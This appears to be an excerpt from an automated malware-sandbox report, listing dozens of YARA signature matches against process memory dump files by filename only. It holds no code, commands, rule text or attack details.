Source: Yara match File source: 00000043.00000000.771438221.000001FA9D6F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000000.667603922.000001489BB00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.389654961.000000000111C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000043.00000000.769688179.000001FA9D6F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000000.703497252.000001CEDB3E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003E.00000000.763965956.0000019933F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000000.596069262.000002240CA50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000000.704474059.000001CEDB3E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003E.00000000.762259112.0000019933F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000000.681894423.0000000003020000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000059.00000000.816576347.000001AF8B6D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003E.00000000.760746671.0000019933F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.495743811.0000000000D29000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000000.702640862.000001CEDB3E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000059.00000000.818431890.000001AF8B6D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000059.00000000.820005242.000001AF8B6D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000000.656463020.000001489BB00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000058.00000000.802729381.0000024EF5620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000000.625911169.000001D023AD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000000.630294105.000001D023AD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000000.590960903.000002240CA50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000000.680178718.0000000003020000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.814285126.0000021F457F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000000.576910703.000002240CA50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.495247062.0000000001148000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000000.681232862.0000000003020000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.497852767.0000000001181000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000058.00000000.801073925.0000024EF5620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000058.00000000.799390295.0000024EF5620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000000.635166996.000001D023AD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000000.673085569.000001489BB00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY